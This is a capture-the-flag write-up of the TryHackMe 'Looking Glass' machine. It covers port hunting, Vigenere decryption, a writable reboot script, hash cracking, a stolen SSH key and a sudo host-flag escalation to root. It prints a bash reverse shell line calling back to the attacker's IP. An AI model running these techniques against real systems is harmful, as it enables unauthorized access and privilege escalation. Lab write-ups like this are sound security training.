data:image/s3,"s3://crabby-images/f1061/f1061a516f037ed93241def64e1faa4d4f5aa371" alt=""
TryHackMe – Looking Glass Walkthrough
Introduction
This was an intermediate Linux machine that involved deciphering a password encrypted using the Vigenere cipher to gain initial access, exploiting a cron job to escalate to the tweedledum user, cracking user hashes to escalate to the humptydumpty user, accessing a private SSH key on the machine to escalate to the alice user and exploiting a misconfigured Sudo rule to escalate privileges to root.
Enumerating
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
data:image/s3,"s3://crabby-images/16373/163733f2812c67a586eaf6370c0011147eb8431f" alt=""
The scan has identified port 22 (SSH) and a large number of ports starting from port 9000, all using SSH. Performing a scan with the -p- flag to enumerate all of he open ports:
data:image/s3,"s3://crabby-images/ccf53/ccf53bc98a76711923d80265a4de50bcfdb64442" alt=""
Enumerating SSH
When connecting to one of the ports (in this case trying one of the higher ones), the SSH server responds with “Higher”:
data:image/s3,"s3://crabby-images/affef/affefb95b3cda8a566a364097d29d80a62884385" alt=""
Whereas when connecting to port 9000, it responds with “Lower”:
data:image/s3,"s3://crabby-images/93f24/93f24fa0c98d19a024de8855d945f0d42490d72e" alt=""
This probably means the objective of the challenge is to find the right SSH port:
After a few more connection attempts, was able to narrow it down between 9800 and 9900:
data:image/s3,"s3://crabby-images/b22d9/b22d940cdef4c50780838d8814b01071bf9d710f" alt=""
Using a quick Bash for loop to find out the exact port:
for i in $(seq 9800 9900); do echo "connecting to port $i"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $i test@10.10.49.207;done | grep -vE 'Lower|Higher'
data:image/s3,"s3://crabby-images/2bef5/2bef5b19950d5132bfe204b81d7204f7da63790f" alt=""
When a connection to port 9850 is made, it responds with a riddle:
data:image/s3,"s3://crabby-images/8682a/8682a5705e1be3e9ca00220680f7e6f9b3d0364d" alt=""
When Googling for jabberwocky, it appears to be a poem and a sequel to Alice’s Adventures in Wonderland:
data:image/s3,"s3://crabby-images/cd511/cd511e734df2b29c3a20f15e045f193978cc40e7" alt=""
The number of characters appears to match the original poem, so perhaps a rotation has been used to encrypt it:
data:image/s3,"s3://crabby-images/f4a3d/f4a3d664b9c2690cd3edea046c240bc30bf6f4c7" alt=""
According to the application, it could be Vigenere, a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword. Using an online Vigenere decryption tool to reveal the clear-text message:
data:image/s3,"s3://crabby-images/2681d/2681dbf64be38702266dbbed332ed52256b1fbe1" alt=""
At the end of the poem, a secret is revealed. Connecting to port 9850 again and when inserting the secret a set of credentials is received:
data:image/s3,"s3://crabby-images/e2a80/e2a80e0f8442d72012ea7e108127244d504800cd" alt=""
Authenticating through SSH on port 22 with the credentials found above:
data:image/s3,"s3://crabby-images/d7c5e/d7c5e6171b79822707e134045045135cbc0de912" alt=""
This has provided remote access to the box as the “jabberwock” user.
Privilege Escalation
Transferring the LinPEAS enumeration script with the Python Simple HTTP Server and Wget:
data:image/s3,"s3://crabby-images/d5ef4/d5ef44c5f0792f531c3f7a880d24ee2418a7770b" alt=""
Executing the script:
data:image/s3,"s3://crabby-images/f1b7f/f1b7fb853eead764a59075ffeec808360180faf2" alt=""
It appears that a Bash script is set to run when the system reboots:
data:image/s3,"s3://crabby-images/a4157/a4157599935118b57896bc085391bffbbd8db0d4" alt=""
It also looks like the jabberwock user can execute reboot as root:
data:image/s3,"s3://crabby-images/ef64f/ef64ff6ec92ce725c937a50b93b9d9a47af68576" alt=""
The twasBrillig.sh script is modifiable by the current user, changing it to execute a reverse shell:
bash -i >& /dev/tcp/10.4.36.186/443 0>&1
data:image/s3,"s3://crabby-images/448c2/448c2987cb053a75a9ab9f5c5bcd0c1ee57255e6" alt=""
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
data:image/s3,"s3://crabby-images/931cb/931cb0d4361dc29c7749c7532ca9faec30d6fbc2" alt=""
When executing /sbin/reboot to restart the system, a callback on the Netcat listener is received, granting a shell as the tweedledum user:
data:image/s3,"s3://crabby-images/ec33b/ec33b9468b91b84199d72b84d26d852e25ced2d8" alt=""
When enuemrating common files and directories, found a file containing what looks like a number of hashes:
data:image/s3,"s3://crabby-images/d3b08/d3b08ef27800249c7f2b3e96eeb54caa792f7e3c" alt=""
When using the Crackstation online cracking tool, it was able to crack all of these apart from one, which according to the the others seems to the password:
data:image/s3,"s3://crabby-images/58ca1/58ca1d29ed7c996ea271c4714557cacc654f7a63" alt=""
Upon further inspection, the last one does not seem to be a hash, when decoding it from HEX it reveals a password:
data:image/s3,"s3://crabby-images/4f64a/4f64a1f9c958036fa3d22d2e68e90b049e0cdba0" alt=""
It turns out this was the password for the humptydumpty user, changing to it:
data:image/s3,"s3://crabby-images/b761d/b761db6e9418cd45512a744380a2930a38e9a7bb" alt=""
This user’s home directory does not seem to contain anything useful:
data:image/s3,"s3://crabby-images/5d530/5d5304b950114a1622b866850bfb49891971eb32" alt=""
Although the alice user’s folder does not allow to list files, the .ssh folder can still be accessed, it appears to contain a private SSH key:
data:image/s3,"s3://crabby-images/dc46e/dc46e9bfe44dc68f75b54da71612b93ea4804c46" alt=""
Copying its contents to a local file:
data:image/s3,"s3://crabby-images/f719c/f719c52904a919b33ff108e53d22f521a1799628" alt=""
Assigning to it the appropriate permissions and using it to authenticate as the alice user:
data:image/s3,"s3://crabby-images/0d1ac/0d1ac00fb4944836dc8d9b417b4407c4023debf8" alt=""
Executing LinPEAS again with the new access that has been obtain through the enumeration performed earlier:
data:image/s3,"s3://crabby-images/bbcfb/bbcfbac70d654ed941875c2dc6f14d2891614e71" alt=""
It appears that there is a Sudo rule for the alice user in the /etc/sudoers.d/alice file:
data:image/s3,"s3://crabby-images/6b982/6b982761994b0596f71f6c759279874479a4feb0" alt=""
The following is the syntax used by the Sudoers files, which means alice can run /bin/bash as root, but only on the “ssalg-gnikool” host.
data:image/s3,"s3://crabby-images/131df/131df4929a655f0116c7ba0cce6a6e6ca53e618e" alt=""
The -h flag can be used to specify the host when executing commands with Sudo:
data:image/s3,"s3://crabby-images/736ff/736ff5180dd7b5dc9767480b9b8a8b53e14b95ff" alt=""
Even though the host cannot be resolved, the commands are still executed as root, therefore granting a root-level shell.
Conclusion
This box was definitely not one of my favourites, as the initial part required a lot of unrealistic enumeration and guessing and did not really reflect a real-life engagement. The privilege escalation part was still quite interesting though.